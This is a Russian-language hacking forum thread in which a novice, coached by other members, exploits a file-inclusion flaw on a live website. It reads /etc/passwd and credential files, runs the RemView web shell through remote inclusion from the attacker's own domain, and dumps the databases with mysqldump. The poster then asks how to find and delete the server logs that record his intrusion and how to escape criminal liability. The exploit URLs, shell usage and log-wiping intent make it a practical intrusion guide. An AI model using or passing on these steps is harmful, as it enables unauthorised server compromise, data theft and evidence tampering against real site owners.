Начнем с того что в старых версиях ПХП возможно использовать NULL-BYTE. Тоесть чтобы экранировать .txt можно использовать %00 Во вторых, чтоже можно сделать чтением файлов? Для начала попробуй прочитать /etc/passwd. В 5% случаев их можно читать =) Далее. Прочитай и сохрани /etc/passwd. Он даст список юзеров. Далее. Попробуй найти на сайте HTTP-passwd-like файлы типа .htpassword .htaccess и т д. И ещё попробуй найти зоны администрирования (наверняка же есть чтото) и прочитать скрипт, содержащий логин и пароль.
Ну в прибавок могу отписать, что судя по ошибке, параметр 'a' возможно не фильтрует входящие данные, что может позволить инклудинг и запуск файла, тоесть любой php код, сохраненный в текстовом файле вероятно запуститса на сервере...это тока теоретическое суждение, верно ли или нет сказать не могу. не известно одно, можно ли эксплуатировать уязвимость удаленно, уже ясно что локально можно.. Попрпбуй добавь к параметру 'a' http:// еси от фильтрует, то значит ток локально.
так и есть - любой РНР код который записан в текстовике потом обрабатывается через index.php и выполняется как РНР, Залил ремвью через форум, только незнаю в какой папке лежит. + там же файл переименовывается. Форум Инвижен 2.0 )
ай-ай-ай! запустился ремвью из удаленного адреса! ненавижу удаффский сленг, но "РЖУНИМАГУ" Народ, теперь такой вопросец: я можно сказать - начинающий. и работаю даже не через проксю Посоветуйте что мне прочитать как себя обезопасить от уголовной отвественности.
хех.. рано обрадовался: ремвью запускаю так: http://victim.com/index.php?a=http://moydomen.ru/remview запускается ремвью, но все ссылки в нем такого вида: http://victim.com/index.php?&c=v&d=d:/site/www/&f=about.txt вообщем мне ремвью только смог показать какие там папки, но ничего просмотреть и скачать я не смогу... хотя может я чтото непонимаю?
в любом случае остается возможность запуска любого Мускульного кода. Подскажите, пожалуйста, - какой командой можно просмотреть структуру базы данных?
ой немогу нормально ремвью работает, просто нужно добавлять параметры так http://victim.com/index.php?a=http://moydomen.ru/remview&&c=l&d=d:/site/www/admin
найди живые прокси сервера. для чтение данных в базе, найди конфиг файлы, которые могут содержать логин/пасс к базе. Залей в папку открытой для записи, скрипт для входа в базу, например у Rst, и воспльзовавшись им, используй данные с конфиг файлов...и вё будет тебе база перед глазами. Ps: у Rst новый веб-шелл содержит все в одном, и шелл, и модуль для входа в базу. Ток на врядли ты там разберещься =)...Эт тебе не ремвью
Почитай отца своего . Шутка для начала Прочитай УК РФ ст.272 . 273 Потом это http://antichat.ru/txt/old/ip.shtml затем это http://antichat.ru/txt/old/anonumus.shtml
Анонимность? - без комментариев Просмотр базы - берешь тот же ремвью и выполняешь код PHP mysql_connect(...) $r = mysql_query("SHOW DATABASES"); $a = mysql_fetch_array($r); foreach($a as $a1) print $a1."\r\n" если не очепятался. и потом тоже для таблиц - SHOW TABLES а потом легче так $ mysqldump --help и ты получил список параметров. mysqldump -u user -p --all-databases > dump.sql
Мда, тамвообщем такая фишка - я получил полностью контроль на домпом сервера Лажу себе по папкам Подскажите - где логи смотреть? удалю наф свои заходы.. Заш1л на апачевский error.log - нет ничего.